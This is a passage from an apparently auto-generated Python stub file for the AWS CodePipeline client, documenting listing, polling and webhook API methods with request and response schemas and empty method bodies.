The data to be returned by the third party job worker.
- **actionTypeId** *(dict) --*
Represents information about an action type.
- **category** *(string) --*
A category defines what kind of action can be taken in the stage, and constrains the provider type for the action. Valid categories are limited to one of the values below.
- **owner** *(string) --*
The creator of the action being called.
- **provider** *(string) --*
The provider of the service being called by the action. Valid providers are determined by the action category. For example, an action in the Deploy category type might have a provider of AWS CodeDeploy, which would be specified as CodeDeploy. To reference a list of action providers by action type, see `Valid Action Types and Providers in CodePipeline <https://docs.aws.amazon.com/codepipeline/latest/userguide/reference-pipeline-structure.html#actions-valid-providers>`__ .
- **version** *(string) --*
A string that describes the action version.
- **actionConfiguration** *(dict) --*
Represents information about an action configuration.
- **configuration** *(dict) --*
The configuration data for the action.
- *(string) --*
- *(string) --*
- **pipelineContext** *(dict) --*
Represents information about a pipeline to a job worker.
.. note::
Does not include ``pipelineArn`` and ``pipelineExecutionId`` for ThirdParty jobs.
- **pipelineName** *(string) --*
The name of the pipeline. This is a user-specified value. Pipeline names must be unique across all pipeline names under an Amazon Web Services account.
- **stage** *(dict) --*
The stage of the pipeline.
- **name** *(string) --*
The name of the stage.
- **action** *(dict) --*
The context of an action to a job worker within the stage of a pipeline.
- **name** *(string) --*
The name of the action within the context of a job.
- **actionExecutionId** *(string) --*
The system-generated unique ID that corresponds to an action's execution.
- **pipelineArn** *(string) --*
The pipeline execution ID provided to the job worker.
- **pipelineExecutionId** *(string) --*
The pipeline Amazon Resource Name (ARN) provided to the job worker.
- **inputArtifacts** *(list) --*
The name of the artifact that will be worked upon by the action, if any. This name might be system-generated, such as "MyApp", or might be defined by the user when the action is created. The input artifact name must match the name of an output artifact generated by an action in an earlier action or stage of the pipeline.
- *(dict) --*
Represents information about an artifact that will be worked upon by actions in the pipeline.
- **name** *(string) --*
The artifact's name.
- **revision** *(string) --*
The artifact's revision ID. Depending on the type of object, this could be a commit ID (GitHub) or a revision ID (Amazon S3).
- **location** *(dict) --*
The location of an artifact.
- **type** *(string) --*
The type of artifact in the location.
- **s3Location** *(dict) --*
The Amazon S3 bucket that contains the artifact.
- **bucketName** *(string) --*
The name of the Amazon S3 bucket.
- **objectKey** *(string) --*
The key of the object in the Amazon S3 bucket, which uniquely identifies the object in the bucket.
- **outputArtifacts** *(list) --*
The name of the artifact that will be the result of the action, if any. This name might be system-generated, such as "MyBuiltApp", or might be defined by the user when the action is created.
- *(dict) --*
Represents information about an artifact that will be worked upon by actions in the pipeline.
- **name** *(string) --*
The artifact's name.
- **revision** *(string) --*
The artifact's revision ID. Depending on the type of object, this could be a commit ID (GitHub) or a revision ID (Amazon S3).
- **location** *(dict) --*
The location of an artifact.
- **type** *(string) --*
The type of artifact in the location.
- **s3Location** *(dict) --*
The Amazon S3 bucket that contains the artifact.
- **bucketName** *(string) --*
The name of the Amazon S3 bucket.
- **objectKey** *(string) --*
The key of the object in the Amazon S3 bucket, which uniquely identifies the object in the bucket.
- **artifactCredentials** *(dict) --*
Represents an AWS session credentials object. These credentials are temporary credentials that are issued by AWS Secure Token Service (STS). They can be used to access input and output artifacts in the Amazon S3 bucket used to store artifact for the pipeline in AWS CodePipeline.
- **accessKeyId** *(string) --*
The access key for the session.
- **secretAccessKey** *(string) --*
The secret access key for the session.
- **sessionToken** *(string) --*
The token for the session.
- **continuationToken** *(string) --*
A system-generated token, such as a AWS CodeDeploy deployment ID, that a job requires in order to continue the job asynchronously.
- **encryptionKey** *(dict) --*
The encryption key used to encrypt and decrypt data in the artifact store for the pipeline, such as an AWS Key Management Service (AWS KMS) key. This is optional and might not be present.
- **id** *(string) --*
The ID used to identify the key. For an AWS KMS key, this is the key ID or key ARN.
- **type** *(string) --*
The type of encryption key, such as an AWS Key Management Service (AWS KMS) key. When creating or updating a pipeline, the value must be set to 'KMS'.
- **nonce** *(string) --*
A system-generated random number that AWS CodePipeline uses to ensure that the job is being worked on by only one job worker. Use this number in an AcknowledgeThirdPartyJob request.
:type jobId: string
:param jobId: **[REQUIRED]**
The unique system-generated ID used for identifying the job.
:type clientToken: string
:param clientToken: **[REQUIRED]**
The clientToken portion of the clientId and clientToken pair used to verify that the calling entity is allowed access to the job and its details.
:rtype: dict
:returns:
"""
pass
def get_waiter(self, waiter_name: str = None) -> Waiter:
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters
section of the service docs for a list of available waiters.
:returns: The specified waiter object.
:rtype: botocore.waiter.Waiter
"""
pass
def list_action_executions(self, pipelineName: str, filter: Dict = None, maxResults: int = None, nextToken: str = None) -> Dict:
"""
Lists the action executions that have occurred in a pipeline.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/ListActionExecutions>`_
**Request Syntax**
::
response = client.list_action_executions(
pipelineName='string',
filter={
'pipelineExecutionId': 'string'
},
maxResults=123,
nextToken='string'
)
**Response Syntax**
::
{
'actionExecutionDetails': [
{
'pipelineExecutionId': 'string',
'actionExecutionId': 'string',
'pipelineVersion': 123,
'stageName': 'string',
'actionName': 'string',
'startTime': datetime(2015, 1, 1),
'lastUpdateTime': datetime(2015, 1, 1),
'status': 'InProgress'|'Succeeded'|'Failed',
'input': {
'actionTypeId': {
'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
'owner': 'AWS'|'ThirdParty'|'Custom',
'provider': 'string',
'version': 'string'
},
'configuration': {
'string': 'string'
},
'roleArn': 'string',
'region': 'string',
'inputArtifacts': [
{
'name': 'string',
's3location': {
'bucket': 'string',
'key': 'string'
}
},
]
},
'output': {
'outputArtifacts': [
{
'name': 'string',
's3location': {
'bucket': 'string',
'key': 'string'
}
},
],
'executionResult': {
'externalExecutionId': 'string',
'externalExecutionSummary': 'string',
'externalExecutionUrl': 'string'
}
}
},
],
'nextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **actionExecutionDetails** *(list) --*
The details for a list of recent executions, such as action execution ID.
- *(dict) --*
Returns information about an execution of an action, including the action execution ID, and the name, version, and timing of the action.
- **pipelineExecutionId** *(string) --*
The pipeline execution ID for the action execution.
- **actionExecutionId** *(string) --*
The action execution ID.
- **pipelineVersion** *(integer) --*
The version of the pipeline where the action was run.
- **stageName** *(string) --*
The name of the stage that contains the action.
- **actionName** *(string) --*
The name of the action.
- **startTime** *(datetime) --*
The start time of the action execution.
- **lastUpdateTime** *(datetime) --*
The last update time of the action execution.
- **status** *(string) --*
The status of the action execution. Status categories are InProgress, Succeeded, and Failed.
- **input** *(dict) --*
Input details for the action execution, such as role ARN, Region, and input artifacts.
- **actionTypeId** *(dict) --*
Represents information about an action type.
- **category** *(string) --*
A category defines what kind of action can be taken in the stage, and constrains the provider type for the action. Valid categories are limited to one of the values below.
- **owner** *(string) --*
The creator of the action being called.
- **provider** *(string) --*
The provider of the service being called by the action. Valid providers are determined by the action category. For example, an action in the Deploy category type might have a provider of AWS CodeDeploy, which would be specified as CodeDeploy. To reference a list of action providers by action type, see `Valid Action Types and Providers in CodePipeline <https://docs.aws.amazon.com/codepipeline/latest/userguide/reference-pipeline-structure.html#actions-valid-providers>`__ .
- **version** *(string) --*
A string that describes the action version.
- **configuration** *(dict) --*
Configuration data for an action execution.
- *(string) --*
- *(string) --*
- **roleArn** *(string) --*
The ARN of the IAM service role that performs the declared action. This is assumed through the roleArn for the pipeline.
- **region** *(string) --*
The AWS Region for the action, such as us-east-1.
- **inputArtifacts** *(list) --*
Details of input artifacts of the action that correspond to the action execution.
- *(dict) --*
Artifact details for the action execution, such as the artifact location.
- **name** *(string) --*
The artifact object name for the action execution.
- **s3location** *(dict) --*
The Amazon S3 artifact location for the action execution.
- **bucket** *(string) --*
The Amazon S3 artifact bucket for an action's artifacts.
- **key** *(string) --*
The artifact name.
- **output** *(dict) --*
Output details for the action execution, such as the action execution result.
- **outputArtifacts** *(list) --*
Details of output artifacts of the action that correspond to the action execution.
- *(dict) --*
Artifact details for the action execution, such as the artifact location.
- **name** *(string) --*
The artifact object name for the action execution.
- **s3location** *(dict) --*
The Amazon S3 artifact location for the action execution.
- **bucket** *(string) --*
The Amazon S3 artifact bucket for an action's artifacts.
- **key** *(string) --*
The artifact name.
- **executionResult** *(dict) --*
Execution result information listed in the output details for an action execution.
- **externalExecutionId** *(string) --*
The action provider's external ID for the action execution.
- **externalExecutionSummary** *(string) --*
The action provider's summary for the action execution.
- **externalExecutionUrl** *(string) --*
The deepest external link to the external resource (for example, a repository URL or deployment endpoint) that is used when running the action.
- **nextToken** *(string) --*
If the amount of returned information is significantly large, an identifier is also returned and can be used in a subsequent ListActionExecutions call to return the next set of action executions in the list.
:type pipelineName: string
:param pipelineName: **[REQUIRED]**
The name of the pipeline for which you want to list action execution history.
:type filter: dict
:param filter:
Input information used to filter action execution history.
- **pipelineExecutionId** *(string) --*
The pipeline execution ID used to filter action execution history.
:type maxResults: integer
:param maxResults:
The maximum number of results to return in a single call. To retrieve the remaining results, make another call with the returned nextToken value. Action execution history is retained for up to 12 months, based on action execution start times. Default value is 100.
.. note::
Detailed execution history is available for executions run on or after February 21, 2019.
:type nextToken: string
:param nextToken:
The token that was returned from the previous ListActionExecutions call, which can be used to return the next set of action executions in the list.
:rtype: dict
:returns:
"""
pass
def list_action_types(self, actionOwnerFilter: str = None, nextToken: str = None) -> Dict:
"""
Gets a summary of all AWS CodePipeline action types associated with your account.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/ListActionTypes>`_
**Request Syntax**
::
response = client.list_action_types(
actionOwnerFilter='AWS'|'ThirdParty'|'Custom',
nextToken='string'
)
**Response Syntax**
::
{
'actionTypes': [
{
'id': {
'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
'owner': 'AWS'|'ThirdParty'|'Custom',
'provider': 'string',
'version': 'string'
},
'settings': {
'thirdPartyConfigurationUrl': 'string',
'entityUrlTemplate': 'string',
'executionUrlTemplate': 'string',
'revisionUrlTemplate': 'string'
},
'actionConfigurationProperties': [
{
'name': 'string',
'required': True|False,
'key': True|False,
'secret': True|False,
'queryable': True|False,
'description': 'string',
'type': 'String'|'Number'|'Boolean'
},
],
'inputArtifactDetails': {
'minimumCount': 123,
'maximumCount': 123
},
'outputArtifactDetails': {
'minimumCount': 123,
'maximumCount': 123
}
},
],
'nextToken': 'string'
}
**Response Structure**
- *(dict) --*
Represents the output of a ListActionTypes action.
- **actionTypes** *(list) --*
Provides details of the action types.
- *(dict) --*
Returns information about the details of an action type.
- **id** *(dict) --*
Represents information about an action type.
- **category** *(string) --*
A category defines what kind of action can be taken in the stage, and constrains the provider type for the action. Valid categories are limited to one of the values below.
- **owner** *(string) --*
The creator of the action being called.
- **provider** *(string) --*
The provider of the service being called by the action. Valid providers are determined by the action category. For example, an action in the Deploy category type might have a provider of AWS CodeDeploy, which would be specified as CodeDeploy. To reference a list of action providers by action type, see `Valid Action Types and Providers in CodePipeline <https://docs.aws.amazon.com/codepipeline/latest/userguide/reference-pipeline-structure.html#actions-valid-providers>`__ .
- **version** *(string) --*
A string that describes the action version.
- **settings** *(dict) --*
The settings for the action type.
- **thirdPartyConfigurationUrl** *(string) --*
The URL of a sign-up page where users can sign up for an external service and perform initial configuration of the action provided by that service.
- **entityUrlTemplate** *(string) --*
The URL returned to the AWS CodePipeline console that provides a deep link to the resources of the external system, such as the configuration page for an AWS CodeDeploy deployment group. This link is provided as part of the action display within the pipeline.
- **executionUrlTemplate** *(string) --*
The URL returned to the AWS CodePipeline console that contains a link to the top-level landing page for the external system, such as console page for AWS CodeDeploy. This link is shown on the pipeline view page in the AWS CodePipeline console and provides a link to the execution entity of the external action.
- **revisionUrlTemplate** *(string) --*
The URL returned to the AWS CodePipeline console that contains a link to the page where customers can update or change the configuration of the external action.
- **actionConfigurationProperties** *(list) --*
The configuration properties for the action type.
- *(dict) --*
Represents information about an action configuration property.
- **name** *(string) --*
The name of the action configuration property.
- **required** *(boolean) --*
Whether the configuration property is a required value.
- **key** *(boolean) --*
Whether the configuration property is a key.
- **secret** *(boolean) --*
Whether the configuration property is secret. Secrets are hidden from all calls except for GetJobDetails, GetThirdPartyJobDetails, PollForJobs, and PollForThirdPartyJobs.
When updating a pipeline, passing * * * * * without changing any other values of the action will preserve the prior value of the secret.
- **queryable** *(boolean) --*
Indicates that the property will be used in conjunction with PollForJobs. When creating a custom action, an action can have up to one queryable property. If it has one, that property must be both required and not secret.
If you create a pipeline with a custom action type, and that custom action contains a queryable property, the value for that configuration property is subject to additional restrictions. The value must be less than or equal to twenty (20) characters. The value can contain only alphanumeric characters, underscores, and hyphens.
- **description** *(string) --*
The description of the action configuration property that will be displayed to users.
- **type** *(string) --*
The type of the configuration property.
- **inputArtifactDetails** *(dict) --*
The details of the input artifact for the action, such as its commit ID.
- **minimumCount** *(integer) --*
The minimum number of artifacts allowed for the action type.
- **maximumCount** *(integer) --*
The maximum number of artifacts allowed for the action type.
- **outputArtifactDetails** *(dict) --*
The details of the output artifact of the action, such as its commit ID.
- **minimumCount** *(integer) --*
The minimum number of artifacts allowed for the action type.
- **maximumCount** *(integer) --*
The maximum number of artifacts allowed for the action type.
- **nextToken** *(string) --*
If the amount of returned information is significantly large, an identifier is also returned which can be used in a subsequent list action types call to return the next set of action types in the list.
:type actionOwnerFilter: string
:param actionOwnerFilter:
Filters the list of action types to those created by a specified entity.
:type nextToken: string
:param nextToken:
An identifier that was returned from the previous list action types call, which can be used to return the next set of action types in the list.
:rtype: dict
:returns:
"""
pass
def list_pipeline_executions(self, pipelineName: str, maxResults: int = None, nextToken: str = None) -> Dict:
"""
Gets a summary of the most recent executions for a pipeline.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/ListPipelineExecutions>`_
**Request Syntax**
::
response = client.list_pipeline_executions(
pipelineName='string',
maxResults=123,
nextToken='string'
)
**Response Syntax**
::
{
'pipelineExecutionSummaries': [
{
'pipelineExecutionId': 'string',
'status': 'InProgress'|'Succeeded'|'Superseded'|'Failed',
'startTime': datetime(2015, 1, 1),
'lastUpdateTime': datetime(2015, 1, 1),
'sourceRevisions': [
{
'actionName': 'string',
'revisionId': 'string',
'revisionSummary': 'string',
'revisionUrl': 'string'
},
]
},
],
'nextToken': 'string'
}
**Response Structure**
- *(dict) --*
Represents the output of a ListPipelineExecutions action.
- **pipelineExecutionSummaries** *(list) --*
A list of executions in the history of a pipeline.
- *(dict) --*
Summary information about a pipeline execution.
- **pipelineExecutionId** *(string) --*
The ID of the pipeline execution.
- **status** *(string) --*
The status of the pipeline execution.
* InProgress: The pipeline execution is currently running.
* Succeeded: The pipeline execution was completed successfully.
* Superseded: While this pipeline execution was waiting for the next stage to be completed, a newer pipeline execution advanced and continued through the pipeline instead.
* Failed: The pipeline execution was not completed successfully.
- **startTime** *(datetime) --*
The date and time when the pipeline execution began, in timestamp format.
- **lastUpdateTime** *(datetime) --*
The date and time of the last change to the pipeline execution, in timestamp format.
- **sourceRevisions** *(list) --*
A list of the source artifact revisions that initiated a pipeline execution.
- *(dict) --*
Information about the version (or revision) of a source artifact that initiated a pipeline execution.
- **actionName** *(string) --*
The name of the action that processed the revision to the source artifact.
- **revisionId** *(string) --*
The system-generated unique ID that identifies the revision number of the artifact.
- **revisionSummary** *(string) --*
Summary information about the most recent revision of the artifact. For GitHub and AWS CodeCommit repositories, the commit message. For Amazon S3 buckets or actions, the user-provided content of a ``codepipeline-artifact-revision-summary`` key specified in the object metadata.
- **revisionUrl** *(string) --*
The commit ID for the artifact revision. For artifacts stored in GitHub or AWS CodeCommit repositories, the commit ID is linked to a commit details page.
- **nextToken** *(string) --*
A token that can be used in the next ListPipelineExecutions call. To view all items in the list, continue to call this operation with each subsequent token until no more nextToken values are returned.
:type pipelineName: string
:param pipelineName: **[REQUIRED]**
The name of the pipeline for which you want to get execution summary information.
:type maxResults: integer
:param maxResults:
The maximum number of results to return in a single call. To retrieve the remaining results, make another call with the returned nextToken value. Pipeline history is limited to the most recent 12 months, based on pipeline execution start times. Default value is 100.
:type nextToken: string
:param nextToken:
The token that was returned from the previous ListPipelineExecutions call, which can be used to return the next set of pipeline executions in the list.
:rtype: dict
:returns:
"""
pass
def list_pipelines(self, nextToken: str = None) -> Dict:
"""
Gets a summary of all of the pipelines associated with your account.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/ListPipelines>`_
**Request Syntax**
::
response = client.list_pipelines(
nextToken='string'
)
**Response Syntax**
::
{
'pipelines': [
{
'name': 'string',
'version': 123,
'created': datetime(2015, 1, 1),
'updated': datetime(2015, 1, 1)
},
],
'nextToken': 'string'
}
**Response Structure**
- *(dict) --*
Represents the output of a ListPipelines action.
- **pipelines** *(list) --*
The list of pipelines.
- *(dict) --*
Returns a summary of a pipeline.
- **name** *(string) --*
The name of the pipeline.
- **version** *(integer) --*
The version number of the pipeline.
- **created** *(datetime) --*
The date and time the pipeline was created, in timestamp format.
- **updated** *(datetime) --*
The date and time of the last update to the pipeline, in timestamp format.
- **nextToken** *(string) --*
If the amount of returned information is significantly large, an identifier is also returned which can be used in a subsequent list pipelines call to return the next set of pipelines in the list.
:type nextToken: string
:param nextToken:
An identifier that was returned from the previous list pipelines call, which can be used to return the next set of pipelines in the list.
:rtype: dict
:returns:
"""
pass
def list_webhooks(self, NextToken: str = None, MaxResults: int = None) -> Dict:
"""
Gets a listing of all the webhooks in this region for this account. The output lists all webhooks and includes the webhook URL and ARN, as well the configuration for each webhook.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/ListWebhooks>`_
**Request Syntax**
::
response = client.list_webhooks(
NextToken='string',
MaxResults=123
)
**Response Syntax**
::
{
'webhooks': [
{
'definition': {
'name': 'string',
'targetPipeline': 'string',
'targetAction': 'string',
'filters': [
{
'jsonPath': 'string',
'matchEquals': 'string'
},
],
'authentication': 'GITHUB_HMAC'|'IP'|'UNAUTHENTICATED',
'authenticationConfiguration': {
'AllowedIPRange': 'string',
'SecretToken': 'string'
}
},
'url': 'string',
'errorMessage': 'string',
'errorCode': 'string',
'lastTriggered': datetime(2015, 1, 1),
'arn': 'string'
},
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **webhooks** *(list) --*
The JSON detail returned for each webhook in the list output for the ListWebhooks call.
- *(dict) --*
The detail returned for each webhook after listing webhooks, such as the webhook URL, the webhook name, and the webhook ARN.
- **definition** *(dict) --*
The detail returned for each webhook, such as the webhook authentication type and filter rules.
- **name** *(string) --*
The name of the webhook.
- **targetPipeline** *(string) --*
The name of the pipeline you want to connect to the webhook.
- **targetAction** *(string) --*
The name of the action in a pipeline you want to connect to the webhook. The action must be from the source (first) stage of the pipeline.
- **filters** *(list) --*
A list of rules applied to the body/payload sent in the POST request to a webhook URL. All defined rules must pass for the request to be accepted and the pipeline started.
- *(dict) --*
The event criteria that specify when a webhook notification is sent to your URL.
- **jsonPath** *(string) --*
A JsonPath expression that will be applied to the body/payload of the webhook. The value selected by JsonPath expression must match the value specified in the matchEquals field, otherwise the request will be ignored. More information on JsonPath expressions can be found here: https://github.com/json-path/JsonPath.
- **matchEquals** *(string) --*
The value selected by the JsonPath expression must match what is supplied in the MatchEquals field, otherwise the request will be ignored. Properties from the target action configuration can be included as placeholders in this value by surrounding the action configuration key with curly braces. For example, if the value supplied here is "refs/heads/{Branch}" and the target action has an action configuration property called "Branch" with a value of "master", the MatchEquals value will be evaluated as "refs/heads/master". A list of action configuration properties for built-in action types can be found here: `Pipeline Structure Reference Action Requirements <https://docs.aws.amazon.com/codepipeline/latest/userguide/reference-pipeline-structure.html#action-requirements>`__ .
- **authentication** *(string) --*
Supported options are GITHUB_HMAC, IP and UNAUTHENTICATED.
* GITHUB_HMAC implements the authentication scheme described here: https://developer.github.com/webhooks/securing/
* IP will reject webhooks trigger requests unless they originate from an IP within the IP range whitelisted in the authentication configuration.
* UNAUTHENTICATED will accept all webhook trigger requests regardless of origin.
- **authenticationConfiguration** *(dict) --*
Properties that configure the authentication applied to incoming webhook trigger requests. The required properties depend on the authentication type. For GITHUB_HMAC, only the SecretToken property must be set. For IP, only the AllowedIPRange property must be set to a valid CIDR range. For UNAUTHENTICATED, no properties can be set.
- **AllowedIPRange** *(string) --*
The property used to configure acceptance of webhooks within a specific IP range. For IP, only the AllowedIPRange property must be set, and this property must be set to a valid CIDR range.
- **SecretToken** *(string) --*
The property used to configure GitHub authentication. For GITHUB_HMAC, only the SecretToken property must be set.
- **url** *(string) --*
A unique URL generated by CodePipeline. When a POST request is made to this URL, the defined pipeline is started as long as the body of the post request satisfies the defined authentication and filtering conditions. Deleting and re-creating a webhook will make the old URL invalid and generate a new URL.
- **errorMessage** *(string) --*
The text of the error message about the webhook.
- **errorCode** *(string) --*
The number code of the error.
- **lastTriggered** *(datetime) --*
The date and time a webhook was last successfully triggered, in timestamp format.
- **arn** *(string) --*
The Amazon Resource Name (ARN) of the webhook.
- **NextToken** *(string) --*
If the amount of returned information is significantly large, an identifier is also returned and can be used in a subsequent ListWebhooks call to return the next set of webhooks in the list.
:type NextToken: string
:param NextToken:
The token that was returned from the previous ListWebhooks call, which can be used to return the next set of webhooks in the list.
:type MaxResults: integer
:param MaxResults:
The maximum number of results to return in a single call. To retrieve the remaining results, make another call with the returned nextToken value.
:rtype: dict
:returns:
"""
pass
def poll_for_jobs(self, actionTypeId: Dict, maxBatchSize: int = None, queryParam: Dict = None) -> Dict:
"""
Returns information about any jobs for AWS CodePipeline to act upon. PollForJobs is only valid for action types with "Custom" in the owner field. If the action type contains "AWS" or "ThirdParty" in the owner field, the PollForJobs action returns an error.
.. warning::
When this API is called, AWS CodePipeline returns temporary credentials for the Amazon S3 bucket used to store artifacts for the pipeline, if the action requires access to that Amazon S3 bucket for input or output artifacts. Additionally, this API returns any secret values defined for the action.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/PollForJobs>`_
**Request Syntax**
::
response = client.poll_for_jobs(
actionTypeId={
'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
'owner': 'AWS'|'ThirdParty'|'Custom',
'provider': 'string',
'version': 'string'
},
maxBatchSize=123,
queryParam={
'string': 'string'
}
)
**Response Syntax**
::
{
'jobs': [
{
'id': 'string',
'data': {
'actionTypeId': {
'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
'owner': 'AWS'|'ThirdParty'|'Custom',
'provider': 'string',
'version': 'string'
},
'actionConfiguration': {
'configuration': {
'string': 'string'
}
},
'pipelineContext': {
'pipelineName': 'string',
'stage': {
'name': 'string'
},
'action': {
'name': 'string',
'actionExecutionId': 'string'
},
'pipelineArn': 'string',
'pipelineExecutionId': 'string'
},
'inputArtifacts': [
{
'name': 'string',
'revision': 'string',
'location': {
'type': 'S3',
's3Location': {
'bucketName': 'string',
'objectKey': 'string'
}
}
},
],
'outputArtifacts': [
{
'name': 'string',
'revision': 'string',
'location': {
'type': 'S3',
's3Location': {
'bucketName': 'string',
'objectKey': 'string'
}
}
},
],
'artifactCredentials': {
'accessKeyId': 'string',
'secretAccessKey': 'string',
'sessionToken': 'string'
},
'continuationToken': 'string',
'encryptionKey': {
'id': 'string',
'type': 'KMS'
}
},
'nonce': 'string',
'accountId': 'string'
},
]
}
**Response Structure**
- *(dict) --*
Represents the output of a PollForJobs action.
- **jobs** *(list) --*
Information about the jobs to take action on.
- *(dict) --*
Represents information about a job.
- **id** *(string) --*
The unique system-generated ID of the job.
- **data** *(dict) --*
Additional data about a job.
- **actionTypeId** *(dict) --*
Represents information about an action type.
- **category** *(string) --*
A category defines what kind of action can be taken in the stage, and constrains the provider type for the action. Valid categories are limited to one of the values below.
- **owner** *(string) --*
The creator of the action being called.
- **provider** *(string) --*
The provider of the service being called by the action. Valid providers are determined by the action category. For example, an action in the Deploy category type might have a provider of AWS CodeDeploy, which would be specified as CodeDeploy. To reference a list of action providers by action type, see `Valid Action Types and Providers in CodePipeline <https://docs.aws.amazon.com/codepipeline/latest/userguide/reference-pipeline-structure.html#actions-valid-providers>`__ .
- **version** *(string) --*
A string that describes the action version.
- **actionConfiguration** *(dict) --*
Represents information about an action configuration.
- **configuration** *(dict) --*
The configuration data for the action.
- *(string) --*
- *(string) --*
- **pipelineContext** *(dict) --*
Represents information about a pipeline to a job worker.
.. note::
Includes ``pipelineArn`` and ``pipelineExecutionId`` for Custom jobs.
- **pipelineName** *(string) --*
The name of the pipeline. This is a user-specified value. Pipeline names must be unique across all pipeline names under an Amazon Web Services account.
- **stage** *(dict) --*
The stage of the pipeline.
- **name** *(string) --*
The name of the stage.
- **action** *(dict) --*
The context of an action to a job worker within the stage of a pipeline.
- **name** *(string) --*
The name of the action within the context of a job.
- **actionExecutionId** *(string) --*
The system-generated unique ID that corresponds to an action's execution.
- **pipelineArn** *(string) --*
The pipeline execution ID provided to the job worker.
- **pipelineExecutionId** *(string) --*
The pipeline Amazon Resource Name (ARN) provided to the job worker.
- **inputArtifacts** *(list) --*
The artifact supplied to the job.
- *(dict) --*
Represents information about an artifact that will be worked upon by actions in the pipeline.
- **name** *(string) --*
The artifact's name.
- **revision** *(string) --*
The artifact's revision ID. Depending on the type of object, this could be a commit ID (GitHub) or a revision ID (Amazon S3).
- **location** *(dict) --*
The location of an artifact.
- **type** *(string) --*
The type of artifact in the location.
- **s3Location** *(dict) --*
The Amazon S3 bucket that contains the artifact.
- **bucketName** *(string) --*
The name of the Amazon S3 bucket.
- **objectKey** *(string) --*
The key of the object in the Amazon S3 bucket, which uniquely identifies the object in the bucket.
- **outputArtifacts** *(list) --*
The output of the job.
- *(dict) --*
Represents information about an artifact that will be worked upon by actions in the pipeline.
- **name** *(string) --*
The artifact's name.
- **revision** *(string) --*
The artifact's revision ID. Depending on the type of object, this could be a commit ID (GitHub) or a revision ID (Amazon S3).
- **location** *(dict) --*
The location of an artifact.
- **type** *(string) --*
The type of artifact in the location.
- **s3Location** *(dict) --*
The Amazon S3 bucket that contains the artifact.
- **bucketName** *(string) --*
The name of the Amazon S3 bucket.
- **objectKey** *(string) --*
The key of the object in the Amazon S3 bucket, which uniquely identifies the object in the bucket.
- **artifactCredentials** *(dict) --*
Represents an AWS session credentials object. These credentials are temporary credentials that are issued by AWS Secure Token Service (STS). They can be used to access input and output artifacts in the Amazon S3 bucket used to store artifact for the pipeline in AWS CodePipeline.
- **accessKeyId** *(string) --*
The access key for the session.
- **secretAccessKey** *(string) --*
The secret access key for the session.
- **sessionToken** *(string) --*
The token for the session.
- **continuationToken** *(string) --*
A system-generated token, such as a AWS CodeDeploy deployment ID, that a job requires in order to continue the job asynchronously.
- **encryptionKey** *(dict) --*
Represents information about the key used to encrypt data in the artifact store, such as an AWS Key Management Service (AWS KMS) key.
- **id** *(string) --*
The ID used to identify the key. For an AWS KMS key, this is the key ID or key ARN.
- **type** *(string) --*
The type of encryption key, such as an AWS Key Management Service (AWS KMS) key. When creating or updating a pipeline, the value must be set to 'KMS'.
- **nonce** *(string) --*
A system-generated random number that AWS CodePipeline uses to ensure that the job is being worked on by only one job worker. Use this number in an AcknowledgeJob request.
- **accountId** *(string) --*
The ID of the AWS account to use when performing the job.
:type actionTypeId: dict
:param actionTypeId: **[REQUIRED]**
Represents information about an action type.
- **category** *(string) --* **[REQUIRED]**
A category defines what kind of action can be taken in the stage, and constrains the provider type for the action. Valid categories are limited to one of the values below.
- **owner** *(string) --* **[REQUIRED]**
The creator of the action being called.
- **provider** *(string) --* **[REQUIRED]**
The provider of the service being called by the action. Valid providers are determined by the action category. For example, an action in the Deploy category type might have a provider of AWS CodeDeploy, which would be specified as CodeDeploy. To reference a list of action providers by action type, see `Valid Action Types and Providers in CodePipeline <https://docs.aws.amazon.com/codepipeline/latest/userguide/reference-pipeline-structure.html#actions-valid-providers>`__ .
- **version** *(string) --* **[REQUIRED]**
A string that describes the action version.
:type maxBatchSize: integer
:param maxBatchSize:
The maximum number of jobs to return in a poll for jobs call.
:type queryParam: dict
:param queryParam:
A map of property names and values. For an action type with no queryable properties, this value must be null or an empty map. For an action type with a queryable property, you must supply that property as a key in the map. Only jobs whose action configuration matches the mapped value will be returned.
- *(string) --*
- *(string) --*
:rtype: dict
:returns:
"""
pass
def poll_for_third_party_jobs(self, actionTypeId: Dict, maxBatchSize: int = None) -> Dict:
"""
Determines whether there are any third party jobs for a job worker to act on. Only used for partner actions.
.. warning::
When this API is called, AWS CodePipeline returns temporary credentials for the Amazon S3 bucket used to store artifacts for the pipeline, if the action requires access to that Amazon S3 bucket for input or output artifacts.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/PollForThirdPartyJobs>`_
**Request Syntax**
::
response = client.poll_for_third_party_jobs(
actionTypeId={
'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
'owner': 'AWS'|'ThirdParty'|'Custom',
'provider': 'string',
'version': 'string'
},
maxBatchSize=123
)
**Response Syntax**
::
{
'jobs': [
{
'clientId': 'string',
'jobId': 'string'
},
]
}
**Response Structure**
- *(dict) --*
Represents the output of a PollForThirdPartyJobs action.
- **jobs** *(list) --*
Information about the jobs to take action on.
- *(dict) --*
A response to a PollForThirdPartyJobs request returned by AWS CodePipeline when there is a job to be worked upon by a partner action.
- **clientId** *(string) --*
The clientToken portion of the clientId and clientToken pair used to verify that the calling entity is allowed access to the job and its details.
- **jobId** *(string) --*
The identifier used to identify the job in AWS CodePipeline.
:type actionTypeId: dict
:param actionTypeId: **[REQUIRED]**
Represents information about an action type.
- **category** *(string) --* **[REQUIRED]**
A category defines what kind of action can be taken in the stage, and constrains the provider type for the action. Valid categories are limited to one of the values below.
